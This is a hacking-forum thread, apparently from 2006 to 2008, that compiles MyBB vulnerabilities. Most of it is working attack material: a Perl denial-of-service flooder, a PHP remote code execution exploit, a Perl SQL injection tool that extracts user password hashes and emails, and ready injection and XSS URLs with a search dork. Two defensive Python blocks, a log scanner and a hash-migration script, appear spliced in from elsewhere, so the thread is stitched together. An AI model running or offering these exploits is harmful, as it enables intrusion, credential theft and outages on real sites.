Forums [Overview of myBB vulnerabilities]

Discussion in 'CMS/forum vulnerabilities' started by Goudini, 22 Nov 2006.

  1. Goudini

    Goudini Elder

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    MyBB <= 1.00 RC4
    SQL Injection Exploit

    Exploit:
    http://milw0rm.org/exploits/1022
    http://milw0rm.org/exploits/1172

    MyBB 1.0.2
    Table prefix name
    Code:
    http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3
    MyBB 1.03
    SQL injection
    Code:
    http://www.example.com/moderation.php?posts=[pid]|[code]&tid=[pid]&action=do_multimergeposts&sep=hr
    MyBB <= 1.04
    SQL injection

    Exploit:
    http://www.security.nnov.ru/files/mybbex.pl

    MyBB <= 1.1.2
    SQL injection
    Code:
    http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*
    MyBB 1.1.2
    remote code execution

    Exploit:
    http://www.security.nnov.ru/files/mybibi.pl


    MyBB <= 1.1.3
    Create An Admin Exploit

    Exploit:
    http://milw0rm.org/exploits/1950

    MyBB <= 1.1.5
    'CLIENT-IP' SQL injection / create new admin exploit
    Exploit:
    http://www.security.nnov.ru/files/mybbsipsql.php
     
    9 people like this.
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    *************Attention - Attention*****************
    Dear users, shame on you. From now on, flooding in this thread and in similar threads will be strictly punished. This is the first and last warning.
    *************Attention - Attention*****************
     
    #2 _-[A.M.D]HiM@S-_, 22 Jan 2007
    Last edited by a moderator: 2 Mar 2007
    3 people like this.
  3. Alex007

    Alex007 New Member

    Joined:
    26 Nov 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    XSS in PunBB <= 1.2.14 & Mybb.ru

    In the profile, the website field is checked for the presence of "http://", and if that bit is missing it is automatically prepended. So code like:
    javascript:{while (true) alert('http:// xss дырка')}
    works.

    The only downside is that the string length is limited. But at the very least a decent sniffer can be slipped in without contortions with avatars, and you can pester the admin with alerts. :)

    Source: http://forscripts.moy.su/blog/2007-04-10-40
    Working example: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9
     
    #3 Alex007, 12 Apr 2007
    Last edited by a moderator: 13 Apr 2007
    3 people like this.
  4. Alex007

    Alex007 New Member

    Joined:
    26 Nov 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    There is the open-source MyBB script - http://mybboard.net; there are the vulnerabilities of the MyBB script - http://forscripts.net/vulnerability/vul_mybb; and there is the free MyBB forum hosting service - http://mybb.ru, which plagiarised not only the PunBB script but also the script's name. Its vulnerabilities are here - http://forscripts.net/vulnerability/vul_punbb, and the vulnerability described above concerns precisely the free service, not the open-source script this thread is about. So what I wrote was a bit off topic.
     
  5. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    MyBB Search Denial of Service

    Code:
    #!/usr/bin/perl
    #####################################
    # MyBB Search Denial of Service
    # Code Written By ZoL64R 
    # KamikaZ Security Team 
    # ISRAEL
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
        print "#################################################\n";
        print "## MyBB Search Denial of Service\n";
        print "## Discoverd By ZoL64R.\n";
        print "#################################################\n";
        print "## [host] [path] \n";
        print "## host.com /mybb\n";
        print "#################################################\n";
        exit();
    }
    for($i=0; $i<99999; $i++)
    {
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
        $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";
        $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";
        $pack.= "Host: " .$host. "\r\n";
        $pack.= "User-Agent: Googlebot/2.1\r\n";
        $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
        $pack.= "Content-Length: " .length($post). "\r\n\r\n";
        $pack.= $post;
        print $socket $pack;
        syswrite STDOUT, "+";
    }
    
    
     
    _________________________
    #5 ettee, 23 Aug 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  6. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065

    Mybb Hot Editor Plugin Local File Inclusion (keyboard.php)

    Mybb Change Password Vulnerability
    Code:
    <form action="http://website/mybb_dir/member.php?debug=1" method="post">
    <table border="0" cellspacing="1" cellpadding="4" class="tborder">
    <tr>
    <td class="trow1" width="40%"><strong>Email Address:</strong></td>
    <td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
    </tr>
    <tr><td align="center">
    <input type="hidden" name="action" value="do_lostpw" />
    <input type="submit" class="button" value="Enter Here" />
    </td></tr>
    </table>
    </form>
    Cross site scripting vulnerabilities:

    http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

    1.2
    inc/generic_error.php?message=<script>alert(document.cookie);</script>
    inc/generic_error.php?message=1&code=<script>alert(document.cookie);</script>

    1.1.7
    /admin/index.php/"><script>alert(1)</script>



    Cross-Site Request Forgery and Cross-Site Scripting (private.php)
    Code:
    First of all user must be REGISTERED and authorized
    - Go to http://target/mybbpath/private.php
    - Insert your XSS code as the Subject
    'Avatar URL' XSS Vulnerability
    Code:
    javasc ript:alert(123)
    Full path disclosure:

    inc/plugins/hello.php
    inc/generic_error.php?message=1
    inc/datahandlers/event.php
    inc/datahandlers/pm.php
    inc/datahandlers/post.php
    inc/datahandlers/user.php

    1.2.4
    http://[TARGET]/[mybb-directory]/member.php?action[]=registe
    http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php
    http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123
     
    _________________________
    2 people like this.
  7. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit


    Code:
    #!/usr/bin/php -q -d short_open_tag=on
    <?php
    
    // magic_quotes_gpc needs to be off
    
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);
    
    if ($argc<5) {
    print "-------------------------------------------------------------------------\r\n";
    print "                 MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";
    print "[HOST] 	  = Target server's hostname or ip address\r\n";
    print "[PATH] 	  = Path where MyBB is located\r\n";
    print "[FORUM_ID] = Valid forum ID\r\n";
    print "[COMMAND]  = Command to execute\r\n\r\n";
    print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print "            		 http://www.w4ck1ng.com\r\n";
    print "            		        ...Silentz\r\n";
    print "-------------------------------------------------------------------------\r\n";
    die;
    }
    
    //Props to rgod for the following functions
    
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    function sendpacketii($packet)
    {
      global $proxy, $host, $port, $html, $proxy_regex;
      if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
      }
      else {
    	$c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
          echo 'No response from proxy...';die;
    	}
      }
      fputs($ock,$packet);
      if ($proxy=='') {
        $html='';
        while (!feof($ock)) {
          $html.=fgets($ock);
        }
      }
      else {
        $html='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
          $html.=fread($ock,1);
        }
      }
      fclose($ock);
    }
    
    function make_seed()
    {
       list($usec, $sec) = explode(' ', microtime());
       return (float) $sec + ((float) $usec * 100000);
    }
    
    $host = $argv[1];
    $path = $argv[2];
    $fid  = $argv[3];
    $cmd  = $argv[4];
    $cmd  = urlencode($cmd);
    $port=80;$proxy="";
    
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    
        $sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
        $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
        $packet.="Connection: Close\r\n\r\n";
        sendpacketii($packet);
    
         $temp=explode("*",$html);
         $temp2=explode("*",$temp[1]);
    
        print "-------------------------------------------------------------------------\r\n";
        print "                MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";    
        print "-------------------------------------------------------------------------\r\n";
        echo  $temp2[0];
        print "-------------------------------------------------------------------------\r\n";
        print "                          http://www.w4ck1ng.com\r\n";
        print "                                 ...Silentz\r\n";
        print "-------------------------------------------------------------------------\r\n";
    
    
    ?>
    
    # milw0rm.com [2008-01-16]

    MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities


    1. Remote Code Execution in "forumdisplay.php":

    Code:
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='
    Example attacks:

    Code:
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];phpinfo();exit;//
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];system('ls');exit;//
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];readfile('inc/config.php');exit;//
    2. Remote Code Execution in "search.php":

    Code:
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='
    Example attacks:

    Code:
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];phpinfo();exit;//
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];system('ls');exit;//
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];readfile('inc/config.php');exit;//
     
    2 people like this.
  8. Mo4x

    Mo4x VX - era of change

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Multiple vulnerabilities in MyBB (formerly MyBulletinBoard) 1.x

    MyBB (formerly MyBulletinBoard) 1.x

    The vulnerability allows a remote user to execute arbitrary PHP code and arbitrary SQL commands in the application's database.

    1) The vulnerability exists due to insufficient sanitisation of input data in the "sortby" parameter in forumdisplay.php and search.php (when "action" is set to "results") before it is used in an "eval()" call. A remote user can execute arbitrary PHP code on the target system. Successful exploitation requires knowledge of valid "fid" values for forumdisplay.php and "sid" values for search.php.

    2) The vulnerability exists due to insufficient sanitisation of input data in the "mergepost" array parameter (when "action" is set to "do_mergeposts"), "rid" (when "action" is set to "allreports"), and "threads" (when "action" is set to "do_multimovethreads") in moderation.php. A remote user can execute arbitrary SQL commands in the application's database by means of a specially crafted request. Successful exploitation requires moderator credentials.

    3) The vulnerability exists due to insufficient sanitisation of input data in the "request" and "gid" parameters in admin/usergroups.php (when "action" is set to "do_joinrequests"). A remote user can execute arbitrary SQL commands in the application's database by means of a specially crafted request. Successful exploitation requires administrator credentials.
     
    #9 Mo4x, 20 Jan 2008
    Last edited by a moderator: 3 Sep 2008
    3 people like this.
  9. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Multiple Sql Injections in MyBB 1.2.10

    SQL Injection in "moderation.php" action "do_mergeposts"

    Vulnerable: 1.2.10

    Successful exploitation requires moderator privileges, specifically the "do_mergeposts" action.
    Below, "waraxe" is the admin's name.


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 
    &mergepost[war]=1&mergepost[axe]=2
    
    We see the error:

    Code:
    MySQL error: 1054 
    Unknown column 'war' in 'where clause' 
    Query: SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts 
    FROM mybb_posts p LEFT JOIN mybb_forums f ON (f.fid=p.fid) 
    WHERE p.tid='0' AND p.pid IN(war,axe) ORDER BY dateline ASC
    
    From the error we learn the table prefix, mybb_ - it may differ.

    Exploit:

    Code:
    http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 
    &mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,
    7+UNION+ALL+SELECT+1, 
    (SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27) 
    +FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
    
    Error:

    Code:
    MySQL error: 1064 
    You have an error in your SQL syntax; check the manual that corresponds to 
    your MySQL server version for the right syntax to use near ... line 1 
    Query: UPDATE mybb_users SET postnum=postnum-1 
    WHERE uid='^waraxe^aff3fcfc70d2a50c3d4c2158233c3901^C5ybEW6b^''
    
    waraxe - admin name
    aff3fcfc70d2a50c3d4c2158233c3901 - password hash
    C5ybEW6b - salt

    SQL Injection in "moderation.php" action "allreports"

    Successful exploitation requires moderator privileges.


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.
    php?fid=2&action=allreports&rid=0' 
    +UNION+SELECT+waraxe--+
    
    Error:

    Code:
    MySQL error: 1054 
    Unknown column 'waraxe' in 'field list' 
    Query: SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE 
    rid <= '0' UNION SELECT waraxe-- '
    
    The error is used to find out the table prefix and is then used to escalate privileges from moderator to administrator, as in the first example.

    SQL Injection in "moderation.php" action "do_multimovethreads"

    Successful exploitation requires moderator privileges, specifically the "canmanagethreads" permission.


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.
    php?fid=2&action=do_multimovethreads 
    &moveto=2&threads=war|axe
    
    Error:

    Code:
    MySQL error: 1054 
    Unknown column 'war' in 'where clause' 
    Query: SELECT fid, visible, replies, unapprovedposts FROM mybb_threads 
    WHERE tid IN (war,axe)
    
    The error is used to find out the table prefix and is then used to escalate privileges from moderator to administrator, as in the first example.
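As an added defender-side example (not part of this thread and not MyBB's own code), the following Python scans web-server access logs for the request shapes described in posts 8 and 9 above: a non-alphabetic `sortby` on forumdisplay.php/search.php, non-numeric `mergepost[]` keys, `rid` and `threads` values on moderation.php, and a non-numeric `gid` on admin/usergroups.php. The log lines, the `/mybb/` path and the assumption that `gid` is an integer group id are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (documentation-range addresses, hypothetical
# /mybb/ path); not real traffic. Apache logs the request line as sent, so values
# arrive percent-encoded and are decoded below by parse_qsl.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Jan/2008:10:00:01 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=lastpost HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [20/Jan/2008:10:00:02 +0000] "GET /mybb/forumdisplay.php?fid=2&sortby=%27%5D%3Bphpinfo%28%29%3Bexit%3B%2F%2F HTTP/1.1" 200 9001 "-" "Mozilla/4.0"
203.0.113.8 - - [20/Jan/2008:10:00:03 +0000] "GET /mybb/moderation.php?fid=2&action=do_mergeposts&mergepost[war]=1&mergepost[axe]=2 HTTP/1.1" 200 812 "-" "Mozilla/4.0"
203.0.113.8 - - [20/Jan/2008:10:00:04 +0000] "GET /mybb/moderation.php?fid=2&action=allreports&rid=0%27+UNION+SELECT+waraxe--+ HTTP/1.1" 200 812 "-" "Mozilla/4.0"
203.0.113.9 - - [20/Jan/2008:10:00:05 +0000] "GET /mybb/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=12|34 HTTP/1.1" 302 0 "-" "Mozilla/4.0"
203.0.113.9 - - [20/Jan/2008:10:00:06 +0000] "GET /mybb/admin/usergroups.php?action=do_joinrequests&gid=3%27 HTTP/1.1" 200 812 "-" "Mozilla/4.0"
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Legitimate sortby values are column names: letters and underscores only.
SORTBY_OK = re.compile(r"[A-Za-z_]*")
# PHP array-style parameter, e.g. mergepost[war] -> ("mergepost", "war")
ARRAY_KEY = re.compile(r"^(\w+)\[(.*)\]$")


def is_int(s: str) -> bool:
    """True for an optionally signed decimal integer, the only valid shape for an id."""
    return s.lstrip("-").isdigit()


def classify(line: str):
    """Return a finding label for one log line, or None if the request looks benign."""
    m = REQ_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    script = target.path.rsplit("/", 1)[-1]
    in_admin = "/admin/" in target.path
    params = parse_qsl(target.query, keep_blank_values=True)

    for key, value in params:
        # 1) sortby is spliced into eval() in forumdisplay.php / search.php (post 8, item 1)
        if script in ("forumdisplay.php", "search.php") and key == "sortby":
            if SORTBY_OK.fullmatch(value) is None:
                return "sortby-eval-injection"
        # 2) moderation.php: mergepost[] keys, rid, and the pipe-separated threads list (post 8, item 2)
        if script == "moderation.php":
            am = ARRAY_KEY.match(key)
            if am and am.group(1) == "mergepost" and not is_int(am.group(2)):
                return "mergepost-key-injection"
            if key == "rid" and not is_int(value):
                return "rid-injection"
            if key == "threads" and not all(is_int(t) for t in value.split("|")):
                return "threads-injection"
        # 3) admin/usergroups.php do_joinrequests (post 8, item 3); gid assumed to be an integer
        if in_admin and script == "usergroups.php" and key == "gid" and not is_int(value):
            return "usergroups-gid-injection"
    return None


def scan(log_text: str):
    """Scan a whole log; return (client ip, script name, finding) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            m = REQ_RE.match(line)
            script = urlsplit(m.group("target")).path.rsplit("/", 1)[-1]
            findings.append((m.group("ip"), script, label))
    return findings


if __name__ == "__main__":
    for ip, script, label in scan(SAMPLE_LOG):
        print(f"{ip:15} {script:20} {label}")
```

The benign lines (a normal `sortby=lastpost` and an all-numeric `threads=12|34`) are not flagged, which is the false-positive check a rule like this needs before it goes into an alerting pipeline.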
     
  10. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    Delete PM's XSRF Vuln

    MyBB 1.2.11
     
    _________________________
    #11 halkfild, 22 Jan 2008
    Last edited by a moderator: 3 Sep 2008
    4 people like this.
  11. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    mybb1.2.11 [disablesmilies] Remote SQL-injection Exploit



    MyBB <= 1.2.11 [disablesmilies] Remote SQL-injection Exploit

    Author: Janek Vind, [waraxe-2008-SA#064], 21. January 2008, Estonia, Tartu, http://www.waraxe.us/advisory-64.html

    Log in to the forum so that your browser gets a valid cookie, then enter your ID and nickname in the fields.

    With one click you will send yourself two messages: one formal, and the second containing the admin's login and password.

    If there is a valid session in the sessions table, you can take it from there and administer the forum without the password.
    Let me remind you that the IP binding used to be bypassed via CLIENT-IP.

    [ i ] Password algorithm: md5(md5($salt).md5($password))

     

    Attached Files:
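As an added example (not from the thread and not MyBB's own code): the password scheme quoted in the post above, md5(md5($salt).md5($password)), implemented in Python together with the login-time upgrade to PBKDF2-HMAC-SHA256 that a defender inheriting such records would want. The PBKDF2 record format and the passwords in the usage are constructed for the example; the salt reuses the one shown in post 9.

```python
import hashlib
import hmac
import os
import re

# Legacy MyBB 1.x records are 32 lowercase hex characters (the shape of the hash in post 9).
LEGACY_HEX = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 600_000  # constructed choice for this example


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def mybb_legacy_hash(password: str, salt: str) -> str:
    """The scheme stated in the post: md5(md5($salt) . md5($password)).
    Two fast MD5 rounds give no work factor, which is why records in this
    format should be upgraded rather than kept."""
    return md5_hex(md5_hex(salt) + md5_hex(password))


def is_legacy_record(stored_hash: str) -> bool:
    return LEGACY_HEX.match(stored_hash) is not None


def verify_legacy(password: str, salt: str, stored_hash: str) -> bool:
    """Constant-time comparison of the recomputed legacy hash with the stored one."""
    return hmac.compare_digest(mybb_legacy_hash(password, salt), stored_hash)


def upgrade_record(password: str, salt: str, stored_hash: str):
    """Login-time migration: if the legacy hash verifies, return a new record in the
    constructed format "pbkdf2$iterations$salt_hex$hash_hex"; otherwise return None."""
    if not (is_legacy_record(stored_hash) and verify_legacy(password, salt, stored_hash)):
        return None
    new_salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), new_salt, PBKDF2_ITERATIONS)
    return f"pbkdf2${PBKDF2_ITERATIONS}${new_salt.hex()}${dk.hex()}"


def verify_upgraded(password: str, record: str) -> bool:
    """Verify a password against a record produced by upgrade_record()."""
    scheme, iters, salt_hex, hash_hex = record.split("$")
    if scheme != "pbkdf2":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


if __name__ == "__main__":
    # Constructed user record: the password is made up, the salt is the one shown in post 9.
    salt, password = "C5ybEW6b", "correct horse battery"
    legacy = mybb_legacy_hash(password, salt)
    print("legacy record:", legacy, "needs upgrade:", is_legacy_record(legacy))
    upgraded = upgrade_record(password, salt, legacy)
    print("upgraded record:", upgraded)
    print("verifies after upgrade:", verify_upgraded(password, upgraded))
```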

  12. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

    Code:
    #!/usr/bin/perl
    
    #
    # MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html
    #
    # Needs MySQL >=4.1 and a valid registration.
    #
    # By F
    #
    
    use IO::Socket;
    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTML::Entities;
    
    ####
    
    	print("\n");
    	print("############################################################################\n");
    	print("#                 MyBB <=1.2.11 SQL Injection Exploit by F                 #\n");
    	print("############################################################################\n");
    
    if(@ARGV<5){
    	print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n");
    	print("############################################################################\n");
    	exit;
    };
    
    $host="http://".$ARGV[0];
    $path=$ARGV[1];
    $user=$ARGV[2];
    $pass=$ARGV[3];
    $vid1=$ARGV[4];
    
    if(@ARGV<=5){
    	$vidn=$vid1;
    }else{
    	$vidn=$ARGV[5];
    };
    
    print("\n");
    print(" [~] Host: ".$host."\n");
    print(" [~] Path: ".$path."\n");
    print(" [~] User: ".$user."\n");
    print(" [~] Pass: ".$pass."\n");
    print(" [~] From  #".$vid1."\n");
    print(" [~] To    #".$vidn."\n");
    print("\n");
    
    ####
    
    # create $browser and $cookie_jar
    $browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent\n");
    $cookie_jar=HTTP::Cookies->new();
    $browser->cookie_jar($cookie_jar);
    
    # try to log in
    $result=$browser->post(
    	$host.$path."member.php",
    	Content=>[
    		"action"=>"do_login",
    		"username"=>$user,
    		"password"=>$pass,
    		"url"=>$host.$path."index.php",
    		"submit"=>"Login",
    	],
    );
    
    # check cookie
    if($cookie_jar->as_string=~m/mybbuser=.*?;/){
    	print(" [+] Login successful\n");
    }else{
    	print(" [-] Login unsuccessful\n");
    	exit;
    };
    
    # try to get uid
    $result=$browser->get($host.$path."usercp.php");
    
    # check result
    if($result->as_string=~m/member\.php\?action=profile&amp;uid=([0-9]*?)"/){
    	$uid=$1;
    	print(" [+] Getting uid successful: ".$uid."\n");
    }else{
    	print(" [-] Getting uid unsuccessful\n");
    	exit;
    };
    
    # construct exploit
    $exploit ="yes','0','0'),";
    $exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',";
    for($vid=$vid1;$vid<=$vidn;$vid++){
    	$exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),";
    };
    $exploit.="'(haxx_end)'),'".time()."','0','no','yes','0','0'),";
    $exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_message=0','0','nuthin0','".time()."','0','no','yes";
    
    # try to send exploit
    $result=$browser->post(
    	$host.$path."private.php",
    	Content=>[
    		"action"=>"do_send",
    		"subject"=>"haxx_message=".(1+rand(65536)),
    		"message"=>"nuthin".(1+rand(65536)),
    		"to"=>$user,
    		"options[disablesmilies]"=>$exploit,
    	],
    );
    
    # check if user is valid
    if(	($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource./) ||
    	($result->as_string=~m/You do not have permission to access this page./) ||
    	($result->as_string=~m/Your account may still be awaiting activation or moderation./)
    ){
    	print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n");
    	exit;
    };
    
    # check the 5 minute cap
    if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes./){
    	print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n");
    	exit;
    };
    
    # check if it successfully sent the messages -> REMOVED, does not work on some installations
    #if($result->as_string=~m/Thank you, your private message has successfully been sent./){
    	print(" [+] Sending messages was successful.\n");
    #}else{
    #	print(" [-] Sending messages was unsuccessful.\n");
    #	print($result->as_string);
    #	exit;
    #};
    
    # delete auxiliary messages
    print(" [+] Deleting auxiliary messages.\n");
    $result=$browser->get($host.$path."private.php?fid=1");
    while($result->as_string=~m/private\.php\?action=read&amp;pmid=([0-9]*?)">haxx_message=[0-9]*?</g){
    	$pmid=$1;
    	$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
    	$result=$browser->get($host.$path."private.php?fid=1");
    };
    
    # download and delete messages
    print(" [+] Exploit successful.\n");
    print("\n");
    
    
    while($result->as_string=~m/private\.php\?action=read&amp;pmid=([0-9]*?)">haxx_result</g){
    	$pmid=$1;
    	$result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid);
    	if($result->as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/){
    		$pm=$1;
    		$pm=~s/\(haxx_delim\)/\n/g;
    		$pm=decode_entities($pm);
    		print($pm);
    	};
    	$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
    	$result=$browser->get($host.$path."private.php?fid=1");
    };
    # milw0rm.com
     
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability

    Code:
    ###################################################################################
    #										  #
    # MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
    #										  #
    #    found by: Lidloses_Auge 							  #
    #    Contact (ICQ):  120946783							  #
    #    Greetz to: free-hack.com							  #
    #										  #
    ###############################################################################################################################################
    #																	      #
    # Vulnerability:															      #
    #																	      #
    #    Document:      pages.php														      #
    #    GET-Parameter: page														      #
    #																	      #
    # Dork:																	      #
    #																	      #
    #    inurl:"pages.php" + intext:"powered by mybb"											      #
    #																	      #
    # Example:																      #
    #																	      #
    #    http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
    #																	      #
    # Notes:																      #
    #																	      #
    #    Successrate depends on the permissions which could be set for viewing the 'page'						              #
    #																	      #
    ###############################################################################################################################################
    
    # milw0rm.com [2008-04-06]
     
  14. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    How to determine the myBB version

    /install/resources/settings.xml
    Example:
    HTML:
    <settings version="122" exported="1129013345">

    /install/resources/mybb_theme.xml
    Example:
    HTML:
    <?xml version="1.0" encoding="UTF-8"?>
    <theme name="MyBB Master Style" version="122">
     
  15. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2 or 3)

    http://milw0rm.com/exploits/6316

    PHP:
    <?php
    // forum mybb <= 1.2.11 remote sql injection vulnerability
    // bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
    // exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
    //
    //        POST http://mybb.ru/forum/private.php HTTP/1.1
    //        Host: mybb.ru
    //        Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
    //        Content-Type: application/x-www-form-urlencoded
    //        Content-Length: 479
    //        Connection: Close
    //
